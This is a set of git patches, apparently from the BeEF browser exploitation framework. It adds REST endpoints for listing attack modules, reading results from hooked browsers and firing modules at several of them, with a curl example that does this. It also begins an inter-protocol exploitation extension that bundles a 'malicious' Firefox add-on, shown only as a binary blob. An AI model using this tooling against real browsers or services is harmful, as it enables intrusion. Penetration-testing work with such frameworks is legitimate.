--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -50,6 +50,7 @@ require 'core/hbmanager'
 ## @note Include RESTful API
 require 'core/main/rest/handlers/hookedbrowsers'
 require 'core/main/rest/handlers/modules'
+require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/api'
diff --git a/core/main/rest/api.rb b/core/main/rest/api.rb
index 0f8ce0b7c..4a848696c 100644
--- a/core/main/rest/api.rb
+++ b/core/main/rest/api.rb
@@ -29,6 +29,12 @@ module BeEF
         end
       end
 
+      module RegisterCategoriesHandler
+        def self.mount_handler(server)
+          server.mount('/api/categories', BeEF::Core::Rest::Categories.new)
+        end
+      end
+
       module RegisterLogsHandler
         def self.mount_handler(server)
           server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
@@ -43,6 +49,8 @@ module BeEF
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
 
diff --git a/core/main/rest/handlers/categories.rb b/core/main/rest/handlers/categories.rb
new file mode 100644
index 000000000..edb2fd242
--- /dev/null
+++ b/core/main/rest/handlers/categories.rb
@@ -0,0 +1,49 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Categories < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        get '/' do
+           categories = BeEF::Modules::get_categories
+           cats = Array.new
+           i = 0
+           # todo add sub-categories support!
+           categories.each do |category|
+             cat = {"id" => i, "name" => category}
+             cats << cat
+             i += 1
+           end
+           cats.to_json
+        end
+
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb
index f0ecf6bbd..20d38047a 100644
--- a/core/main/rest/handlers/hookedbrowsers.rb
+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -30,12 +30,16 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
         # @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
+        #
         #get "/to/a/pub"
         #  "BeER please"
         #end
 
+        #
         # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
+        #
         get '/' do
           online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
           offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
@@ -49,7 +53,9 @@ module BeEF
           output.to_json
         end
 
+        #
         # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
+        #
         get '/:session' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
diff --git a/core/main/rest/handlers/logs.rb b/core/main/rest/handlers/logs.rb
index 848e1fd2e..7f90ad884 100644
--- a/core/main/rest/handlers/logs.rb
+++ b/core/main/rest/handlers/logs.rb
@@ -30,13 +30,17 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
         # @note Get all global logs
+        #
         get '/' do
           logs = BeEF::Core::Models::Log.all()
           logs_to_json(logs)
         end
 
+        #
         # @note Get hooked browser logs
+        #
         get '/:session' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
diff --git a/core/main/rest/handlers/modules.rb b/core/main/rest/handlers/modules.rb
index 158a9209f..bc3c8a8b3 100644
--- a/core/main/rest/handlers/modules.rb
+++ b/core/main/rest/handlers/modules.rb
@@ -30,7 +30,9 @@ module BeEF
                   'Expires' => '0'
         end
 
+        #
         # @note Get all available and enabled modules (id, name, category)
+        #
         get '/' do
           mods = BeEF::Core::Models::CommandModule.all
 
@@ -50,7 +52,18 @@ module BeEF
           mods_hash.to_json
         end
 
+        get '/search/:mod_name' do
+          mod = BeEF::Core::Models::CommandModule.first(:name => params[:mod_name])
+          result = {}
+          if mod != nil
+            result = {'id' => mod.id}
+          end
+          result.to_json
+        end
+
+        #
         # @note Get the module definition (info, options)
+        #
         get '/:mod_id' do
           cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
           error 404 unless cmd != nil
@@ -76,20 +89,29 @@ module BeEF
         #Content-Type: application/json; charset=UTF-8
         #
         #{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
+        #
         get '/:session/:mod_id/:cmd_id' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
           cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
                                                   :command_module_id => params[:mod_id], :id => params[:cmd_id])
           error 404 unless cmd != nil
-          result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
-          error 404 unless result != nil
-          {
-             'date' => result.date,
-             'data' => result.data
-          }.to_json
+          results = BeEF::Core::Models::Result.all(:hooked_browser_id => hb.id, :command_id => cmd.id)
+          error 404 unless results != nil
+
+          results_hash = {}
+          i = 0
+          results.each do |result|
+            results_hash[i] = {
+                'date' => result.date,
+                'data' => result.data
+            }
+            i+=1
+          end
+          results_hash.to_json
         end
 
+        #
         # @note Fire a new command module to the specified hooked browser.
         # Return the command_id of the executed module if it has been fired correctly.
         # Input must be specified in JSON format
@@ -123,6 +145,7 @@ module BeEF
         #Content-Length: 35
         #
         #{"success":"true","command_id":"not_available"}
+        #
         post '/:session/:mod_id' do
           hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
           error 401 unless hb != nil
@@ -142,6 +165,7 @@ module BeEF
           end
         end
 
+        #
         #@note Fire a new command module to multiple hooked browsers.
         # Returns the command IDs of the launched modules, or 0 if firing got issues.
         # POST request body example (for modules that don't need parameters, just remove "mod_params")
@@ -156,6 +180,7 @@ module BeEF
         # curl example (alert module with custom text, 2 hooked browsers)):
         #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
         #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
+        #
         post '/multi' do
           request.body.rewind
           begin

From b8c36b206beea0edf98dc9a3cd006365470f1696 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 15:52:15 +1100
Subject: [PATCH 070/397] Added first implementation of the IPEC extension,
 including the malicious FirefoxExtension.

---
 extensions/ipec/config.yaml                   |  21 +++++
 extensions/ipec/extension.rb                  |  60 ++++++++++++
 extensions/ipec/files/LinkTargetFinder.xpi    | Bin 0 -> 8844 bytes
 .../files/LinkTargetFinder/chrome.manifest    |   8 ++
 .../chrome/content/browser.xul                |  22 +++++
 .../chrome/content/linkTargetFinder.js        |  37 ++++++++
 .../chrome/content/options.xul                |  31 ++++++
 .../defaults/preferences/prefs.js             |  21 +++++
 .../ipec/files/LinkTargetFinder/install.rdf   |  23 +++++
 .../locale/en-US/translations.dtd             |   1 +
 .../ipec/files/LinkTargetFinder/skin/skin.css |  12 +++
 .../LinkTargetFinder/skin/status-bar.png      | Bin 0 -> 423 bytes
 .../LinkTargetFinder/skin/toolbar-large.png   | Bin 0 -> 1067 bytes
 extensions/ipec/junk_calculator.rb            |  40 ++++++++
 extensions/ipec/models/ipec_exploits.rb       |  37 ++++++++
 extensions/ipec/models/ipec_exploits_run.rb   |  36 +++++++
 extensions/ipec/rest/ipec.rb                  |  88 ++++++++++++++++++
 17 files changed, 437 insertions(+)
 create mode 100644 extensions/ipec/config.yaml
 create mode 100644 extensions/ipec/extension.rb
 create mode 100644 extensions/ipec/files/LinkTargetFinder.xpi
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome.manifest
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
 create mode 100644 extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
 create mode 100644 extensions/ipec/files/LinkTargetFinder/install.rdf
 create mode 100644 extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
 create mode 100644 extensions/ipec/files/LinkTargetFinder/skin/skin.css
 create mode 100644 extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
 create mode 100644 extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
 create mode 100644 extensions/ipec/junk_calculator.rb
 create mode 100644 extensions/ipec/models/ipec_exploits.rb
 create mode 100644 extensions/ipec/models/ipec_exploits_run.rb
 create mode 100644 extensions/ipec/rest/ipec.rb

diff --git a/extensions/ipec/config.yaml b/extensions/ipec/config.yaml
new file mode 100644
index 000000000..28b9dde4b
--- /dev/null
+++ b/extensions/ipec/config.yaml
@@ -0,0 +1,21 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    extension:
+        ipec:
+            enable: true 
+            name: 'Inter-Protocol Exploitation'
+            authors: ["antisnatchor"]
diff --git a/extensions/ipec/extension.rb b/extensions/ipec/extension.rb
new file mode 100644
index 000000000..b8464e0d6
--- /dev/null
+++ b/extensions/ipec/extension.rb
@@ -0,0 +1,60 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+
+  #todo remove it from here:
+  # Handlers
+  #require 'extensions/ipec/fingerprinter'
+  #require 'extensions/ipec/launcher'
+  require 'extensions/ipec/junk_calculator'
+
+  module Ipec
+    extend BeEF::API::Extension
+
+    @short_name = 'Ipec'
+    @full_name = 'Inter-Protocol Exploitation'
+    @description = "Use the Inter-Protocol Exploitation technique to send shellcode to daemons implementing 'tolerant' protocols."
+
+    module RegisterIpecRestHandler
+      def self.mount_handler(server)
+        server.mount('/api/ipec', BeEF::Extension::Ipec::IpecRest.new)
+      end
+    end
+
+    BeEF::API::Registrar.instance.register(BeEF::Extension::Ipec::RegisterIpecRestHandler, BeEF::API::Server, 'mount_handler')
+
+    #todo remove it from here, and make it dynamic.
+    BeEF::Extension::Ipec::JunkCalculator.instance.bind_junk_calculator("imapeudora1")
+  end
+end
+end
+
+# Models
+# todo: to be used when we'll have more IPEC exploits
+#require 'extensions/ipec/models/ipec_exploits'
+#require 'extensions/ipec/models/ipec_exploits_run'
+
+# RESTful api endpoints
+require 'extensions/ipec/rest/ipec'
+
+
+
+
+
+
+
+
diff --git a/extensions/ipec/files/LinkTargetFinder.xpi b/extensions/ipec/files/LinkTargetFinder.xpi
new file mode 100644
index 0000000000000000000000000000000000000000..3fadfa9c2419213df4bb78d510da982ad639dc40
GIT binary patch
literal 8844
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
Lg6S$H^3(qSqQF(L

literal 0
HcmV?d00001

diff --git a/extensions/ipec/files/LinkTargetFinder/chrome.manifest b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
new file mode 100644
index 000000000..f9ad9ab4c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
@@ -0,0 +1,8 @@
+content     linktargetfinder    chrome/content/
+content     linktargetfinder    chrome/content/ contentaccessible=yes
+overlay chrome://browser/content/browser.xul chrome://linktargetfinder/content/browser.xul
+
+locale	linktargetfinder	en-US	locale/en-US/
+
+skin	linktargetfinder	classic/1.0	skin/
+style	chrome://global/content/customizeToolbar.xul	chrome://linktargetfinder/skin/skin.css
\ No newline at end of file
